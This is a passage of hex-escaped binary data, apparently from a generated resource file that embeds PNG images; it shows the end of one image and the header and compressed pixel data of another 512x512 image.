\xb8\x46\x58\xd5\x98\x3f\x42\x17\xec\x81\x00\x01\x02\x41\x05\x04\
\x80\xa0\x8d\xd9\xb7\x2d\x63\xfe\x7d\x6e\xde\x22\x40\x80\x40\x3f\
\x01\x01\xa0\x44\xcf\x8d\xf9\x4b\xb4\x51\x11\x04\x08\x10\x38\x51\
\x40\x00\x38\x11\x7b\xc2\xa7\x8c\xf9\x27\xa0\x5a\x92\x00\x01\x02\
\x1d\x04\x04\x80\x74\x5d\x36\xe6\x4f\xd7\x32\x1b\x26\x40\x80\x40\
\x40\x01\x01\x20\x60\x53\x9e\xdf\x92\x31\x7f\x9a\x56\xd9\x28\x01\
\x02\x04\x12\x08\x08\x00\xf1\x9b\x64\xcc\x1f\xbf\x47\x76\x48\x80\
\x00\x81\x74\x02\x02\x40\xc8\x96\x19\xf3\x87\x6c\x8b\x4d\x11\x20\
\x40\xa0\x90\x80\x00\x10\xaa\x99\xc6\xfc\xa1\xda\x61\x33\x04\x08\
\x10\x28\x2c\x20\x00\xc4\x68\xae\x31\x7f\x8c\x3e\xd8\x05\x01\x02\
\x04\xda\x08\x08\x00\x97\xb5\xda\x98\xff\x32\x7a\x1f\x26\x40\x80\
\x00\x81\x45\x00\x38\xfd\x10\x18\xf3\x9f\x4e\xee\x83\x04\x08\x10\
\x20\xf0\x9d\x80\x00\x70\xde\xa1\x30\xe6\x3f\xcf\xda\x97\x08\x10\
\x20\x40\xe0\x81\x80\x00\x30\xf5\x88\x18\xf3\x4f\xe5\xb5\x38\x01\
\x02\x04\x08\xec\x16\x10\x00\x76\xd3\xbd\xf6\xa2\x31\xff\x14\x56\
\x8b\x12\x20\x40\x80\xc0\x30\x01\x01\x60\x18\xe5\xc7\x85\x8c\xf9\
\xc7\x7a\x5a\x8d\x00\x01\x02\x04\x26\x09\x08\x00\x87\x61\x8d\xf9\
\x0f\x13\x5a\x80\x00\x01\x02\x04\x4e\x17\x10\x00\x76\x93\x1b\xf3\
\xef\xa6\xf3\x22\x01\x02\x04\x08\x5c\x2e\x20\x00\x6c\x6f\x81\x31\
\xff\x76\x33\x6f\x10\x20\x40\x80\x40\x30\x01\x01\x60\x55\x43\x8c\
\xf9\x57\x31\x79\x88\x00\x01\x02\x04\xd2\x08\x08\x00\xaf\xb6\xca\
\x98\x3f\xcd\x49\xb6\x51\x02\x04\x08\x10\xd8\x24\x20\x00\x3c\xcf\
\x65\xcc\xbf\xe9\x18\x79\x98\x00\x01\x02\x04\xb2\x09\x08\x00\xff\
\xed\x98\x31\x7f\xb6\xc3\x6b\xbf\x04\x08\x10\x20\xb0\x5f\x40\x00\
\x58\x8c\xf9\xf7\x1f\x1f\x6f\x12\x20\x40\x80\x40\x56\x81\xce\x01\
\xc0\x98\x3f\xeb\xa9\xb5\x6f\x02\x04\x08\x10\x38\x2c\xd0\x2c\x00\
\x18\xf3\x1f\x3e\x31\x16\x20\x40\x80\x00\x81\x12\x02\x4d\x02\x80\
\x31\x7f\x89\xd3\xaa\x08\x02\x04\x08\x10\x18\x26\x50\x3d\x00\x18\
\xf3\x0f\x3b\x2a\x16\x22\x40\x80\x00\x81\x4a\x02\x05\x03\x80\x31\
\x7f\xa5\x03\xaa\x16\x02\x04\x08\x10\x98\x23\x50\x28\x00\x18\xf3\
\xcf\x39\x22\x56\x25\x40\x80\x00\x8c\x2f\x44\x07\x00\x00\x03\x1b\
\x49\x44\x41\x54\x81\x8a\x02\x15\x02\x80\x31\x7f\xc5\x93\xa9\x26\
\x02\x04\x08\x10\x98\x2a\x90\x34\x00\x18\xf3\x4f\x3d\x15\x16\x27\
\x40\x80\x00\x81\xf2\x02\xc9\x02\x80\x31\x7f\xf9\x13\xa9\x40\x02\
\x04\x08\x10\x38\x45\x20\x4b\x00\x30\xe6\x3f\xe5\x38\xf8\x08\x01\
\x02\x04\x08\x74\x11\x08\x1c\x00\x8c\xf9\xbb\x1c\x42\x75\x12\x20\
\x40\x80\xc0\xf9\x02\x01\x03\x80\x31\xff\xf9\xc7\xc0\x17\x09\x10\
\x20\x40\xa0\x9b\x40\xa4\x00\x60\xcc\xdf\xed\xf4\xa9\x97\x00\x01\
\x02\x04\x2e\x13\xb8\x38\x00\x18\xf3\x5f\xd6\x79\x1f\x26\x40\x80\
\x00\x81\xd6\x02\x17\x05\x00\x63\xfe\xd6\xa7\x4e\xf1\x04\x08\x10\
\x20\x70\xb9\xc0\xd9\x01\xc0\x98\xff\xf2\x96\xdb\x00\x01\x02\x04\
\x08\x10\x58\x96\x13\x02\x80\x31\xbf\x83\x46\x80\x00\x01\x02\x04\
\xa2\x09\x4c\x0c\x00\xc6\xfc\xd1\x9a\x6d\x3f\x04\x08\x10\x20\x40\
\xe0\xb3\xc0\x8c\x00\x60\xcc\xef\x7c\x11\x20\x40\x80\x00\x81\xe0\
\x02\x83\x02\x80\x31\x7f\xf0\x3e\xdb\x1e\x01\x02\x04\x08\x10\xf8\
\x4a\xe0\x60\x00\x30\xe6\x77\x9e\x08\x10\x20\x40\x80\x40\x46\x81\
\xbd\x01\xc0\x98\x3f\x63\xb7\xed\x99\x00\x01\x02\x04\x08\x7c\x12\
\xd8\x10\x00\x8c\xf9\x9d\x1a\x02\x04\x08\x10\x20\x50\x45\x60\x45\
\x00\x30\xe6\xaf\xd2\x6c\x75\x10\x20\x40\x80\x00\x81\xcf\x02\xaf\
\x05\x00\x63\x7e\xe7\x84\x00\x01\x02\x04\x08\x14\x15\xf8\x26\x00\
\x18\xf3\x17\xed\xb3\xb2\x08\x10\x20\x40\x80\xc0\x57\x02\x9f\x02\
\x80\x31\xbf\x73\x41\x80\x00\x01\x02\x04\x3a\x09\x3c\x05\x80\x77\
\xb7\xf7\x6f\x7f\xeb\x54\xb4\x5a\x09\x10\x20\x40\x80\x40\x77\x81\
\x5b\x77\x00\xf5\x13\x20\x40\x80\x00\x81\x8e\x02\x02\x40\xc7\xae\
\xab\x99\x00\x01\x02\x04\xda\x0b\x08\x00\xed\x8f\x00\x00\x02\x04\
\x08\x10\xe8\x28\x20\x00\x74\xec\xba\x9a\x09\x10\x20\x40\xa0\xbd\
\x80\x00\xd0\xfe\x08\x00\x20\x40\x80\x00\x81\x8e\x02\x02\x40\xc7\
\xae\xab\x99\x00\x01\x02\x04\xda\x0b\x08\x00\xed\x8f\x00\x00\x02\
\x04\x08\x10\xe8\x28\x20\x00\x74\xec\xba\x9a\x09\x10\x20\x40\xa0\
\xbd\x80\x00\xd0\xfe\x08\x00\x20\x40\x80\x00\x81\x8e\x02\x02\x40\
\xc7\xae\xab\x99\x00\x01\x02\x04\xda\x0b\x08\x00\xed\x8f\x00\x00\
\x02\x04\x08\x10\xe8\x28\x20\x00\x74\xec\xba\x9a\x09\x10\x20\x40\
\xa0\xbd\x80\x00\xd0\xfe\x08\x00\x20\x40\x80\x00\x81\x8e\x02\x02\
\x40\xc7\xae\xab\x99\x00\x01\x02\x04\xda\x0b\x08\x00\xed\x8f\x00\
\x00\x02\x04\x08\x10\xe8\x28\x20\x00\x74\xec\xba\x9a\x09\x10\x20\
\x40\xa0\xbd\x80\x00\xd0\xfe\x08\x00\x20\x40\x80\x00\x81\x8e\x02\
\x02\x40\xc7\xae\xab\x99\x00\x01\x02\x04\xda\x0b\x08\x00\xed\x8f\
\x00\x00\x02\x04\x08\x10\xe8\x28\x20\x00\x74\xec\xba\x9a\x09\x10\
\x20\x40\xa0\xbd\x80\x00\xd0\xfe\x08\x00\x20\x40\x80\x00\x81\x8e\
\x02\x02\x40\xc7\xae\xab\x99\x00\x01\x02\x04\xda\x0b\x08\x00\xed\
\x8f\x00\x00\x02\x04\x08\x10\xe8\x28\x20\x00\x74\xec\xba\x9a\x09\
\x10\x20\x40\xa0\xbd\x80\x00\xd0\xfe\x08\x00\x20\x40\x80\x00\x81\
\x8e\x02\x02\x40\xc7\xae\xab\x99\x00\x01\x02\x04\xda\x0b\x08\x00\
\xed\x8f\x00\x00\x02\x04\x08\x10\xe8\x28\x20\x00\x74\xec\xba\x9a\
\x09\x10\x20\x40\xa0\xbd\x80\x00\xd0\xfe\x08\x00\x20\x40\x80\x00\
\x81\x8e\x02\x02\x40\xc7\xae\xab\x99\x00\x01\x02\x04\xda\x0b\x08\
\x00\xed\x8f\x00\x00\x02\x04\x08\x10\xe8\x28\x20\x00\x74\xec\xba\
\x9a\x09\x10\x20\x40\xa0\xbd\x80\x00\xd0\xfe\x08\x00\x20\x40\x80\
\x00\x81\x8e\x02\x02\x40\xc7\xae\xab\x99\x00\x01\x02\x04\xda\x0b\
\x08\x00\xed\x8f\x00\x00\x02\x04\x08\x10\xe8\x28\x20\x00\x74\xec\
\xba\x9a\x09\x10\x20\x40\xa0\xbd\xc0\xff\x03\xd7\x40\xd1\x02\x5f\
\x28\x1f\xf9\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x3e\x92\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x02\x00\x00\x00\x02\x00\x08\x06\x00\x00\x00\xf4\x78\xd4\xfa\
\x00\x00\x20\x00\x49\x44\x41\x54\x78\x5e\xed\x9d\x8b\x75\xdd\xb6\
\xd2\x46\x07\x6e\x20\xfe\x2b\x10\x5d\x41\x94\x0a\xa2\x54\x60\xa5\
\x82\x28\x0d\x44\x4c\x05\x96\x2b\x08\x95\x06\x62\x57\x10\xb9\x02\
\xcb\x15\x44\xa9\xc0\x3c\x15\x5c\xa7\x01\xe1\x5f\xc3\x43\x3d\x2c\
\x4b\x3a\x38\x24\xde\xd8\x5c\xcb\xeb\x3e\x04\x02\x98\x3d\x90\xf0\
\x11\x18\x0c\x8c\xf0\x40\x00\x02\x45\x10\xb0\x7f\x7e\xfe\xf1\xb6\
\xa3\x56\x3a\x91\x17\xdd\xbd\x8e\xbf\x14\x91\xc3\x27\x0c\xe9\xc4\
\xda\xfb\x65\x9f\xb7\xd7\x98\xcb\x1d\x40\xbe\x88\xc8\xd5\x6d\x19\
\x73\x7d\x57\xfe\xda\xfc\x6b\xfa\x4e\x7f\xce\x03\x01\x08\x64\x4e\
\xc0\x64\xde\x3f\xba\x07\x81\xea\x09\xdc\x4e\xec\xf6\xc5\xd1\x6c\
\xec\xfd\xc9\xfc\x50\xac\xd5\xff\x5d\xde\x63\xcc\x28\x22\xfa\x4f\
\x9f\xf9\xbf\x5f\x8f\x62\x64\x94\x6b\xb3\x31\x7d\x77\xf3\xb3\xf2\
\x6c\xa3\xc7\x10\xa8\x80\x00\x02\xa0\x02\x27\x62\x42\xde\x04\xec\
\x30\xbe\x94\x17\xf6\x7b\xb9\xfb\x6a\xd7\xaf\x71\xfd\x57\xee\xe4\
\xee\x0b\xf9\x9d\x48\x40\x20\xf8\x62\x4a\x3d\x10\x70\x24\x80\x00\
\x70\x04\x45\x31\x08\xec\x22\x70\x6f\xa2\x3f\x14\x79\xa1\xcb\xf1\
\xba\xf4\x7e\xf3\x55\xbf\xeb\x75\x7e\xfe\x90\x80\x31\x37\x5b\x0d\
\x57\x22\xd3\xca\xc1\x95\xf9\xed\xd5\x27\x40\x41\x00\x02\x7e\x08\
\x20\x00\xfc\x70\xa4\x96\xc6\x08\xd8\x61\x3c\x14\x63\xbf\x9f\x27\
\x7a\x9d\xec\xf9\x9a\x8f\x35\x06\xee\x56\x0d\x2e\xc5\x5c\x5f\xcd\
\xdb\x09\x77\x31\x09\xb1\xfa\x41\x3b\x10\x28\x9c\x00\x02\xa0\x70\
\x07\xd2\xfd\xf0\x04\xec\x30\x76\xdb\x25\xfc\xe9\xab\xfe\x88\xaf\
\xfa\xf0\xcc\x17\xb5\xb0\x0d\x5e\xbc\x12\x0d\x4a\xbc\x36\x9f\x08\
\x46\x5c\x44\x91\x97\x1a\x22\x80\x00\x68\xc8\xd9\x98\xea\x46\x60\
\x0a\xca\xdb\x06\xe4\xdd\x4c\xf8\x65\x06\xe1\xb9\x99\x5b\x6f\xa9\
\xed\x4a\xc1\xa5\xc8\xf5\x95\xd8\x49\x10\xb0\x4a\x50\xaf\xb7\xb1\
\x6c\x01\x01\x04\xc0\x02\x68\xbc\x52\x17\x81\x7b\x13\x3e\x5f\xf7\
\x75\xb9\xf6\x6b\x6b\xee\x62\x0a\x74\xeb\xe0\x92\x78\x82\x9a\x9d\
\x8d\x6d\x2e\x04\x10\x00\x2e\x94\x28\x53\x15\x01\x26\xfc\xaa\xdc\
\xb9\xce\x98\x69\xdb\xe0\xfa\x82\x15\x82\x75\x18\x79\xbb\x4c\x02\
\x08\x80\x32\xfd\x46\xaf\xf7\x20\x30\x45\xe7\x1b\xfb\x5a\xe4\xc5\
\xf1\xbc\x87\xcf\x92\xfe\x1e\xfc\x9a\x29\x7a\xb3\x65\x60\xae\x2f\
\x88\x21\x68\xc6\xeb\x4d\x1b\x8a\x00\x68\xda\xfd\xf5\x1a\xbf\x8d\
\xd2\x37\xaf\x45\xe4\x58\xac\x7d\x2a\x43\x5e\xbd\x00\xb0\x6c\x3d\
\x81\x6d\x50\xe1\xa5\x58\xfb\x81\xf8\x81\xf5\x38\xa9\x21\x3f\x02\
\x08\x80\xfc\x7c\x42\x8f\x16\x12\xb0\x7f\x7e\x7e\x2d\x76\xfa\xca\
\xd7\x49\x9f\xaf\xfc\x85\x1c\x79\xed\x11\x02\xdb\xf8\x81\x0b\x31\
\xd7\x17\xe6\xb7\x57\x1f\x60\x04\x81\x1a\x08\x20\x00\x6a\xf0\x62\
\xc3\x36\x30\xe9\x37\xec\xfc\x54\xa6\x23\x06\x52\x91\xa7\x5d\xcf\
\x04\x10\x00\x9e\x81\x52\x5d\x78\x02\x4c\xfa\xe1\x19\xd3\x82\x23\
\x01\xc4\x80\x23\x28\x8a\xe5\x48\x00\x01\x90\xa3\x57\xe8\xd3\x37\
\x04\x98\xf4\x19\x14\xd9\x13\x40\x0c\x64\xef\x22\x3a\xf8\x35\x01\
\x04\x00\x23\x22\x5b\x02\x73\x20\xdf\x2f\x22\x72\xc2\x9e\x7e\xb6\
\x6e\xa2\x63\x8f\x11\xb8\x11\x03\xd6\x9e\x13\x40\xc8\x10\xc9\x95\
\x00\x02\x20\x57\xcf\x34\xda\xaf\xf9\xc8\xde\x2f\x22\x2f\x74\xd2\
\x27\x7a\xbf\xd1\x71\x50\x95\xd9\xc6\xe8\x65\x46\x83\x58\xa3\xa7\
\x09\x34\x98\x90\x07\x02\x59\x10\x40\x00\x64\xe1\x06\x3a\x31\x2f\
\xf1\xeb\xa4\xaf\x51\xfc\x3c\x10\xa8\x8f\xc0\xdd\xaa\xc0\x7b\xd3\
\x77\x7a\xc4\x90\x07\x02\x49\x09\x20\x00\x92\xe2\x6f\xbb\xf1\xe9\
\x92\x1d\x63\x6e\x96\xf8\xbb\xb6\x69\x60\x7d\x53\x04\xa6\xa4\x43\
\xd3\xaa\x80\x8a\x01\x56\x05\x9a\x72\x7e\x3e\xc6\x22\x00\xf2\xf1\
\x45\x33\x3d\xb1\xc3\x78\x34\x4d\xfc\xd6\x9e\x34\x63\x34\x86\x42\
\xe0\x29\x02\xc6\xbc\x13\x6b\x59\x15\x60\x84\x44\x27\x80\x00\x88\
\x8e\xbc\xcd\x06\xef\xa5\xe3\x3d\x13\x6b\xf9\xda\x6f\x73\x18\x60\
\xf5\x73\x04\xb6\xab\x02\x67\xe6\xf4\xd5\x7b\x40\x41\x20\x06\x01\
\x04\x40\x0c\xca\x0d\xb7\x31\x2f\xf3\xbf\x21\x3b\x5f\xc3\x83\x00\
\xd3\xf7\x23\xb0\x8d\x15\x18\x64\x7b\x82\x80\xed\x81\xfd\xe8\x51\
\x7a\x0f\x02\x08\x80\x3d\x60\x51\xd4\x9d\xc0\x7c\x84\xef\x94\x65\
\x7e\x77\x66\x94\x84\xc0\x57\x04\xee\x82\x06\xdf\x9a\xbe\x1b\xa1\
\x03\x01\xdf\x04\x10\x00\xbe\x89\x36\x5e\xdf\xbc\xbf\xff\x46\xac\
\x3d\x6a\x1c\x05\xe6\x43\xc0\x1f\x01\x63\x2e\xe6\x15\x01\x4e\x0f\
\xf8\xa3\xda\x7c\x4d\x08\x80\xe6\x87\x80\x1f\x00\xf6\xfc\xb3\x9e\
\xdd\xef\x39\xbb\xef\x87\x27\xb5\x40\xe0\x51\x02\x73\x4e\x01\xe2\
\x04\x18\x1f\x3e\x08\x20\x00\x7c\x50\x6c\xb8\x8e\x79\xe2\x27\xb0\
\xaf\xe1\x31\x80\xe9\x09\x08\x10\x30\x98\x00\x7a\x7d\x4d\x22\x00\
\xea\xf3\x69\x14\x8b\x98\xf8\xa3\x60\xa6\x11\x08\x3c\x4f\x00\x21\
\xc0\x08\x59\x41\x00\x01\xb0\x02\x5e\x8b\xaf\x32\xf1\xb7\xe8\x75\
\x6c\xce\x9e\x00\x42\x20\x7b\x17\xe5\xd8\x41\x04\x40\x8e\x5e\xc9\
\xb0\x4f\x4c\xfc\x19\x3a\x85\x2e\x41\xe0\x21\x01\x84\x00\x63\x62\
\x0f\x02\x08\x80\x3d\x60\xb5\x58\x94\x89\xbf\x45\xaf\x63\x73\xf1\
\x04\x34\x58\xd0\xda\xdf\xb9\x73\xa0\x78\x4f\x06\x35\x00\x01\x10\
\x14\x6f\xb9\x95\x73\x9c\xaf\x5c\xdf\xd1\x73\x08\xdc\x12\x30\xe6\
\x52\xac\xd5\x3c\x02\x1c\x1f\x64\x58\x7c\x43\x00\x01\xc0\xa0\xf8\
\x8a\xc0\x9c\xb9\xef\x0f\x6e\xe5\x63\x60\x40\xa0\x22\x02\xdb\x3c\
\x02\xba\x22\x40\x42\xa1\x8a\xdc\xba\xd6\x14\x04\xc0\x5a\x82\x95\
\xbc\xbf\xcd\xd5\x6f\x34\x81\x4f\x5f\x89\x49\x98\x01\x01\x08\x7c\
\x1b\x23\xa0\x47\x76\x49\x31\xcc\xc8\x98\x08\x20\x00\x1a\x1f\x08\
\xf3\xc4\x7f\x2a\x22\x9a\xc4\xe7\x65\xe3\x38\x30\x1f\x02\xf5\x13\
\x98\x52\x0c\x5f\xf7\x24\x13\xaa\xdf\xd5\xbb\x2c\x44\x00\xec\x22\
\x54\xf1\xcf\xed\x30\x1e\x8b\x31\xba\xdc\xcf\xed\x7c\x15\xfb\x19\
\xd3\x20\xf0\x28\x01\x02\x05\x9b\x1f\x18\x08\x80\x06\x87\xc0\xbc\
\xcf\xff\x17\xf9\xfa\x1b\x74\x3e\x26\x43\xe0\xdb\x6d\x01\xe2\x03\
\x1a\x1d\x15\x08\x80\x86\x1c\x7f\xbb\xdc\x6f\xed\x59\x43\x66\x63\
\x2a\x04\x20\xe0\x42\xc0\x18\xe2\x03\x5c\x38\x55\x54\x06\x01\x50\
\x91\x33\x9f\x33\x85\xe5\xfe\x46\x1c\x8d\x99\x10\x58\x43\x40\x13\
\x09\x59\xfb\x2b\xc7\x06\xd7\x40\x2c\xe7\x5d\x04\x40\x39\xbe\x5a\
\xd4\x53\x96\xfb\x17\x61\xe3\x25\x08\xb4\x4d\x60\x7b\x6c\x50\x85\
\xc0\x97\xb6\x41\xd4\x6d\x3d\x02\xa0\x62\xff\xda\xf3\xcd\x1b\xa2\
\xfb\x2b\x76\x30\xa6\x41\x20\x24\x01\x4e\x0b\x38\xd1\xb5\x7f\x7e\
\xfe\xf1\x9b\x82\xd7\x66\x53\x42\xce\x05\x04\x80\x93\x8b\xcb\x2a\
\x64\x87\xf1\x50\x8c\xd1\x20\xbf\xc3\xb2\x7a\x4e\x6f\x21\x00\x81\
\xec\x08\x6c\xb3\x09\xea\x6a\x00\x49\x84\x44\x64\xce\x92\xfa\x5a\
\x44\x8e\x9f\x3d\x41\x35\x09\x28\xb9\x14\xb9\xbe\xc8\xf5\xc8\x25\
\x02\x20\xbb\xdf\xb6\x75\x1d\x9a\xbe\xfa\x09\xf2\x5b\x07\x91\xb7\
\x21\x00\x81\xaf\x09\x6c\x27\xb3\xc1\x9c\x1e\xbc\x6d\x15\xcd\xaa\
\x7b\x51\x66\x7e\xb9\x25\x61\x42\x00\x54\x32\x9a\xf9\xea\xaf\xc4\
\x91\x98\x01\x81\x9c\x09\x34\x98\x3b\xc0\xeb\xdf\xd6\xcc\xb6\x55\
\x10\x00\x39\xff\xb2\x39\xf4\x8d\x14\xbe\x0e\x90\x28\x02\x01\x08\
\xf8\x25\x60\xcc\x59\x0b\xab\x01\x76\x18\x4f\x44\xe4\x2f\xbf\xf0\
\x34\x07\xaf\x79\x37\xdf\xcd\x90\x34\xc8\x12\x01\xe0\xdd\xb3\xf1\
\x2a\xf4\xaa\x4c\xe3\x75\x9b\x96\x20\x00\x81\x1a\x08\x6c\x57\x03\
\x34\x36\xe0\xaa\x06\x73\x1e\xda\x60\xcf\x37\x1a\x47\xa5\x02\x20\
\xcc\xb3\xe5\xf7\x53\xca\x93\x16\x08\x80\x30\xae\x0d\x5e\x2b\x7b\
\xfd\xc1\x11\xd3\x00\x04\x20\xb0\x8b\xc0\x76\x49\xfb\xcc\x9c\xbe\
\x3a\xdf\x55\xb4\xa4\x9f\x07\x9f\xfc\x6f\x60\x24\x16\x01\x08\x80\
\x92\x46\xe5\x36\x02\xb5\x9b\x23\xfc\x8f\x0a\xeb\x3a\xdd\x85\x00\
\x04\x6a\x25\x50\x51\xde\x80\x60\xcb\xfe\x4f\xf9\xde\x98\x0b\x73\
\x7a\xf0\x73\x8a\xa1\x81\x00\x48\x41\x7d\x61\x9b\xd3\xc0\xdc\x5e\
\xde\xc3\xad\x7d\x0b\x19\xf2\x1a\x04\x20\x10\x88\x80\xae\x06\x6c\
\xb7\x04\x2e\x02\xb5\x10\xbc\xda\x79\x5b\xf5\x63\x82\xbf\xb1\xbf\
\x9b\xbe\x1b\x82\x1b\xf8\xa0\x01\x04\x40\x6c\xe2\x0b\xda\x9b\x03\
\xfd\x74\x3f\xea\x78\xc1\xeb\xbc\x02\x01\x08\x40\x20\x1e\x01\x63\
\x06\xb1\xf6\x6d\xca\xbd\xed\xa5\xc6\xda\xf3\xcd\x3f\x49\xf2\xa7\
\x6c\xc5\xd3\xab\xd8\xcc\x10\x00\x4b\x47\x4a\xa4\xf7\x66\x45\xfa\
\x37\x57\xf6\x46\x02\x4e\x33\x10\x80\xc0\x7a\x02\xdb\x3b\x05\x7e\
\x2e\x29\x40\xd0\x0e\xa3\x5e\x92\xa6\xd9\x53\x53\x3d\xef\x4d\xdf\
\x85\x0b\x3a\x7c\xc4\x2a\x04\x40\x2a\x57\x3b\xb4\x6b\xcf\x3f\x9f\
\x8a\x35\xd1\x97\x85\x1c\xba\x46\x11\x08\x40\x00\x02\xbb\x09\x18\
\xdb\x97\x10\x20\x38\xc7\x56\xe9\xd7\x7f\xea\xed\xd5\xff\x8b\xb9\
\x0a\x80\x00\xd8\x3d\x84\xa3\x97\x60\xc9\x3f\x3a\x72\x1a\x84\x00\
\x04\x42\x11\xc8\xe4\xcc\xfb\x73\xe6\xd9\xf3\x8d\xee\xfb\xe7\x10\
\x58\x1d\x35\x16\x00\x01\x10\x6a\xd0\x2f\xac\x97\x25\xff\x85\xe0\
\x78\x0d\x02\x10\xc8\x97\x40\xc6\x39\x03\xec\x30\xf6\x22\xf2\x47\
\x1e\xf0\xcc\x27\xd3\x1f\x44\x13\x22\x08\x80\x3c\xbc\x3e\xf5\x22\
\xfa\xf1\x93\x8c\x6c\xa7\x2b\x10\x80\x40\xe5\x04\xb6\x81\x6e\xfa\
\x85\xfb\x2e\x17\x4b\x33\x5a\xfa\xbf\x45\x62\xfa\x2e\xda\xbc\x1c\
\xad\xa1\x5c\x1c\x9e\x63\x3f\xe6\x25\x7f\x3d\xde\x17\x35\x00\x24\
\x47\x16\xf4\x09\x02\x10\xa8\x9c\x80\x31\x7a\xa9\xd0\xef\x39\x58\
\x99\xd1\xd2\xff\x7d\x1c\x9a\x1d\xf0\x32\x06\x1f\x04\x40\x0c\xca\
\xcf\xb4\x31\x2b\x50\x8d\xf2\xe7\xea\xde\xc4\xbe\xa0\x79\x08\x40\
\x20\x12\x81\xc4\x19\xf0\xe6\x15\xd7\x8c\x96\xfe\xbf\xe2\xae\xa7\
\x27\xa2\xe4\x52\x40\x00\x44\x1a\xef\x8f\x35\x33\xdf\x2b\xad\x93\
\x7f\xea\xc8\xd3\x84\x14\x68\x1a\x02\x10\x68\x92\xc0\x76\x4b\x40\
\x27\xbb\x28\x5f\xbb\xf7\x19\xe7\xb8\xf4\x7f\xaf\x7f\x9a\x43\x41\
\x8f\x24\x06\x7f\x10\x00\xc1\x11\x3f\xde\x00\xfb\xfd\x89\xc0\xd3\
\x2c\x04\x20\x90\x1b\x01\xcd\x1e\x18\x35\x2e\x20\xd3\xa5\xff\x1b\
\xbf\x20\x00\x72\x1b\xa1\x3e\xfb\x13\xed\xa2\x09\x9f\x9d\xa6\x2e\
\x08\x40\x00\x02\xa1\x08\x18\xf3\xce\x9c\x1e\xfc\x1a\xaa\xfa\x07\
\x5f\xff\xb9\x2e\xfd\x23\x00\x62\x0c\x80\x54\x6d\xcc\xc1\x7e\x7a\
\xde\x94\xfd\xfe\x54\x4e\xa0\x5d\x08\x40\x20\x4f\x02\xc6\x5c\xce\
\x5b\x02\x5f\x42\x75\x30\xf3\xa5\x7f\x04\x40\x28\xc7\xa7\xae\x97\
\xf3\xfd\xa9\x3d\x40\xfb\x10\x80\x40\xf6\x04\xb6\xc1\x81\x1a\x17\
\x30\x86\xe8\x6b\xe6\x4b\xff\x08\x80\x10\x4e\x4f\x5d\x27\xc1\x7e\
\xa9\x3d\x40\xfb\x10\x80\x40\x31\x04\xb6\xc1\x81\x7a\x14\xee\xca\
\x67\x9f\xf3\x4a\xf8\xf3\xac\x65\xc4\x00\xf8\x74\x7c\xca\xba\x08\
\xf6\x4b\x49\x9f\xb6\x21\x00\x81\x22\x09\x78\x4e\x1a\x54\xc8\xd2\
\x3f\x2b\x00\x45\x0e\xd6\x27\x3a\x6d\xcf\x37\x6f\xc4\xda\x28\xc7\
\x39\x6a\xe2\x86\x2d\x10\x80\x00\x04\x26\x02\x9e\x2e\x13\x2a\x64\
\xe9\x1f\x01\x50\xcb\xb0\x27\xd2\xbf\x16\x4f\x62\x07\x04\x20\x90\
\x94\xc0\xca\x13\x02\x05\x2d\xfd\x23\x00\x92\x0e\x34\x0f\x8d\xcf\
\x91\xfe\x9a\xdc\x27\xda\x85\x0e\x1e\xba\x4d\x15\x10\x80\x00\x04\
\xf2\x25\xb0\xf0\x84\x40\x61\x4b\xff\x08\x80\x7c\x47\xe0\xee\x9e\
\x71\xcc\x6f\x37\x23\x4a\x40\x00\x02\x10\x58\x44\x60\x41\xfa\xe0\
\xc2\x96\xfe\x11\x00\x8b\x06\x46\x06\x2f\x91\xd3\x3f\x03\x27\xd0\
\x05\x08\x40\xa0\x6e\x02\x7b\x88\x80\x02\x97\xfe\x11\x00\x25\x8e\
\xde\xf9\x8c\xbf\x26\xf8\x21\xa7\x7f\x89\x0e\xa4\xcf\x10\x80\x40\
\x39\x04\x1c\x44\x40\xa1\x4b\xff\x08\x80\x72\x46\xe1\xb6\xa7\x4c\
\xfe\xa5\x79\x8c\xfe\x42\x00\x02\xc5\x13\xd8\x91\x2b\xa0\xd0\xa5\
\x7f\x04\x40\x49\x03\x93\xc9\xbf\x24\x6f\xd1\x57\x08\x40\xa0\x2a\
\x02\x4f\x88\x80\x82\x97\xfe\x11\x00\xa5\x0c\x50\x26\xff\x52\x3c\
\x45\x3f\x21\x00\x81\x6a\x09\x3c\x10\x01\x85\x2f\xfd\x23\x00\x4a\
\x18\xa8\x64\xf7\x2b\xc1\x4b\xf4\x11\x02\x10\x68\x82\xc0\x56\x04\
\xe8\xfd\x01\x97\x85\x2f\xfd\x23\x00\x72\x1f\xb0\x4c\xfe\xb9\x7b\
\x88\xfe\x41\x00\x02\x4d\x12\x30\xe6\x42\xac\x3d\xae\xc0\x76\xee\
\x02\xc8\xd1\x89\x4c\xfe\x39\x7a\x85\x3e\x41\x00\x02\x10\xa8\x8a\
\x00\x02\x20\x37\x77\x32\xf9\xe7\xe6\x11\xfa\x03\x01\x08\x40\xa0\
\x4a\x02\x08\x80\x9c\xdc\xca\xe4\x9f\x93\x37\xe8\x0b\x04\x20\x00\
\x81\xaa\x09\x20\x00\x72\x71\xef\x14\xed\x2f\xf2\x4f\x2e\xfd\xa1\
\x1f\x10\x80\x00\x04\x20\x50\x35\x01\x04\x40\x0e\xee\xe5\xa8\x5f\
\x0e\x5e\xa0\x0f\x10\x80\x00\x04\x9a\x22\x80\x00\x48\xed\x6e\x26\
\xff\xd4\x1e\xa0\x7d\x08\x40\x00\x02\x4d\x12\x40\x00\xa4\x74\x3b\
\x93\x7f\x4a\xfa\xb4\x0d\x01\x08\x40\xa0\x69\x02\x08\x80\x54\xee\
\x67\xf2\x4f\x45\x9e\x76\x21\x00\x01\x08\x40\x40\x44\x10\x00\x29\
\x86\x81\x1d\xc6\x97\x62\xcc\x3f\x62\x6d\x97\xa2\x7d\xda\x84\xc0\
\xfe\x04\xcc\xbf\x22\xf2\x65\xfb\x9e\xbd\xba\xfb\xef\xd3\xff\x31\
\xce\xff\xf6\xaf\xf6\xee\x0d\xfd\x5d\xb8\xf7\xfb\x60\x34\x28\xf6\
\xe6\xd6\xcb\x97\x22\xf6\xfb\x35\x95\xf3\x2e\x04\x20\xf0\x0d\x01\
\x04\x40\xec\x41\x31\x4f\xfe\x7a\xa5\xaf\xfe\x81\xe3\x81\x40\x06\
\x04\xcc\x7f\x22\x72\x25\x62\x6f\x26\xf2\x9b\xff\xfc\x62\xfa\x4e\
\x27\xfb\x6c\x1e\x3b\x8c\x47\x73\x67\x6e\x04\x42\x27\x62\x3a\x11\
